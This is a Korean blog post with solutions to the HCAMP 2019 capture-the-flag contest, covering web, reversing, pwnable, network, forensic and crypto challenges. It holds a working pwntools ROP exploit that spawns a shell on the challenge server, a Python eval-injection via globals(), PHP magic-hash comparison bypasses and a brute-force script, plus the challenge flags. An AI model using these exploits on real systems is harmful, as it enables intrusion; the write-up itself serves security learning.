티스토리 뷰
Web Hacking
- admin
admin을 입력하면 필터링되어서 없어지는 것을 보아 필터링을 우회하여 admin을 입력하면된다.
하지만, i가 나오면 앞의 내용이 사라지는 것 같아서 애를 먹었다.
admadmiin
HCAMP{rls1004is_so_cute>_<}
- What The Hash
Stage 1
<?php
if ( md5($_GET['hash']) == "0800fc577294c34e0b28ad2839435945" ) // what the hash?
solve();
?>
hash : hash
Stage 2
<?php
if ( md5($_GET['hash']) == "0e3282358235823234951228234725" ) // what the hash ??
solve2();
?>
hash : QNKCDZO
Stage 3
<?php
if ( isset($_GET['hash1']) && isset($_GET['hash2']) ) {
if ( $_GET['hash1'] == $_GET['hash2'] ) echo "what the hash?<br>";
else if ( md5($_GET['hash1']) == md5($_GET['hash2']) ) // what the hash !!?
solve3();
}
?>
hash1 : QNKCDZO
hash2 : 240610708
Stage 4
<?php
if ( isset($_GET['hash1']) && isset($_GET['hash2']) ) {
if ( md5($_GET['hash1']) == sha1($_GET['hash2']) ) // what the hash !!???
solve4();
}
?>
hash1 : 240610708
hash2 : 10932435112
php Magic Hashes 취약점 문제이다.
HCAMP{139be1eb99d5bca35eb69e69204950d6}
- Plz solveme
# flag in /flag
from flask import Flask, render_template, request, session, redirect, url_for
from multiprocessing import Process
import re
import time
import shutil
import tempfile
app = Flask(__name__)
FLAG = 'flag is HCAMP{flag in real server, this is not flag}'
@app.route('/', methods=['GET'])
def main():
exp = request.args.get('exp')
if exp is None:
return 'read source'
rm_list = ['system', 'import', 'os', 'exec', 'sys', '__', 'read', 'open', 'flag', 'FLAG']
for rm in rm_list:
if rm in exp:
return 'No Hack'
res = ''
try:
res = str(eval(exp))
except:
res = 'error'
return exp + ' => ' + res
app.run(host='0.0.0.0', port=2222, threaded=True)#, debug=True)
GET 방식으로 exp인자의 값을 입력받아 필터링한다. 여기서 FLAG는 글로벌 변수이다. 글로벌 변수를 출력하는 Python 함수가 있다.
globals()
HCAMP{please_solve_laeasy_judge!!}
Reversing
- Easy_Mips
def main():
data = "KA@NRzp2^F6rz]S0t2qqhme|"
flag = ""
for i in range(len(data)):
flag += chr(ord(data[i]) ^ (3-i%3))
print(flag)
if __name__ == "__main__" :
main()
HCAMP{s0_E4sy_R3v3rsing}
- Unicorn
import base64
FirstData = [83,69,78,66,84,86,66,55,85,71,86,110]
one =""
for i in range(len(FirstData)):
one += chr(FirstData[i])
# print(base64.b64decode(one))
SecondData = [0x49 ,0x48 ,0x5e ,0x21 ,0x73 ,0x6a ,0x28 ,0x3b ,0x40 ,0x55 ,0x25 ,0x66]
two = ""
for i in range(len(SecondData)):
SecondData[i] = SecondData[i] ^ 0x10
two += chr(SecondData[i])
#print(base64.b64decode(two))
ThirdData = [73,83,69,104,73,85,66,65,80,68,53,86]
three =""
for i in range(len(ThirdData)):
three += chr(ThirdData[i])
#print(base64.b64decode(three))
four = "bmlDb3JOKip9"
print(base64.b64decode(one+two+three+four))
- Can U Login?
import sys
import base64
def main() :
Encoded_ID = "SENBTVAyMDE5"
ID = base64.b64decode("SENBTVAyMDE5")
print(str("ID >> "+ID))
s2 = [0x65, 0x7A, 0x4D, 0x70, 0x38, 0x1A, 0x70, 0x43, 0x18, 0x28, 0x20, 0x34, 0x63, 0x2D]
for i in range(len(s2)): # input : 0T!dsfadfsa => 0x22
s2[i] = s2[i] ^ 0x22
pw = [0,0,0,0,0,0,0,0,0,0,0,0,0,0]
pw[0] = s2[0] ^ 0x64
pw[11] = s2[11] ^ 0x67
pw[3] = s2[3] ^ 0x39
pw[10] = s2[10] ^ 0x6B
pw[9] = s2[9] ^ 0x61
pw[5] = s2[5] ^ 0x5f
pw[13] = s2[13] ^ 0x2c
pw[6] = s2[6] ^ 0x31
pw[1] = s2[1] ^ 0x33
pw[7] = s2[7] ^ 0x31
pw[4] = s2[4] ^ 0x23
pw[8] = s2[8] ^ 0x69
pw[2] = s2[2] ^ 0x30
pw[12] = s2[12] ^ 0x31
pw2 = ""
for i in range(len(pw)):
pw2 += chr(pw[i])
print(str("PW>>" + pw2) )
if __name__ == "__main__" :
main()
ID >> HCAMP2019
PW>>#k_k9gcPSkiqp#HCAMP{D0_not_Duplicated_p4ssword}
Pwnable
- ucanfind
from pwn import *
e = ELF('ucanfind_16eb51348c4b4ac893a5c25f7af20ad8')
p = remote("kshgroup.kr", 19192)
raw_input(">>> ")
gadget1 = 0x4007a6
gadget2 = 0x400790
syscall = 0x40068f
def chain(faddr, arg1, arg2, arg3):
ret = 'B'*8
ret += p64(0)
ret += p64(1)
ret += p64(faddr)
ret += p64(arg3)
ret += p64(arg2)
ret += p64(arg1)
ret += p64(gadget2)
return ret
payload = "A"*1032
payload += p64(gadget1)
payload += chain(e.got['read'], 0, e.bss(), 59)
payload += chain(e.bss(), e.bss()+8, 0, 0)
payload2 = p64(syscall)
payload2 += "/bin/sh\x00"
payload2 += "\x00"*(59-len(payload2))
p.readuntil(": ")
p.send(payload)
sleep(0.5)
p.send(payload2)
sleep(0.5)
p.interactive()
HCAMP{y0ud1d_a_re4lly_n1ce_job@@++}
Network
- 나는 언젠가 플래그를 보았다.
flag.xps 라는 파일의 패킷을 발견했다
flag.xps 파일을 다운받아 확장자를 .zip 으로 바꾸어 보면 Resources -> Images -> image_0.png 라는 파일이 있다.
HCAMP{Oh_My_G0ddess!@!@@@!}
Misc
- Where….?!?!?
사진에 보이는 간판을 검색하여 플래그를 찾으면 된다.
HCAMP{dnjfemzjqqnrfh54rlf}
- 아아 뫄위쿠 퉤수투
Base64 디코딩을 계속하면 된다.
HCAMP{B4se64_x_30@@_XD}
- 더 풀래구 줴눼뤠위퉈
from pwn import *
import string
import time
nc = remote('kshgroup.kr', 19191)
send_data = ''
for count in range(0,21):
for i in range(0,125):
string = '"'+str(count)+'":'+str(i)
nc.sendline("{"+send_data+string+"}")
nc.recvuntil('Your flag is')
result = nc.recv().replace('Input your generator config >','').replace('\n','')
flag = result[1:result.index('Flag')]
check = result[result.index('Check')+8:result.index('/')]
print(flag)
if int(check) == count+1:
send_data += string+","
break
HCAMP{B33P_B33P@@_Fla9_Fl4g}
Forensic
양념 친구들!
HCAMP{H3ll04PN9!!}
YOU_MUST_LOGOFF
HCAMP{Waterman_.c0ll1iy_198702190905}
태보의 저주
HCAMP{taebo_hae!}
Crypto
- genius_brain
Base64 -> hex -> string
HCAMP{FuUUUUUUUUUUUUUc7F!#@$}
'Write-up' 카테고리의 다른 글
| [picoCTF] Buffer Overflow 1 (0) | 2019.06.19 |
|---|---|
| DEFCON 27 Quals Write-UP (0) | 2019.05.15 |
| TRUST CTF (0) | 2019.02.17 |
| CODEGATE 2019 Perliminary (0) | 2019.02.17 |
| KERIS 제 4회 정보보안경진대회 (0) | 2018.11.05 |
댓글
최근에 올라온 글
- Total
- Today
- Yesterday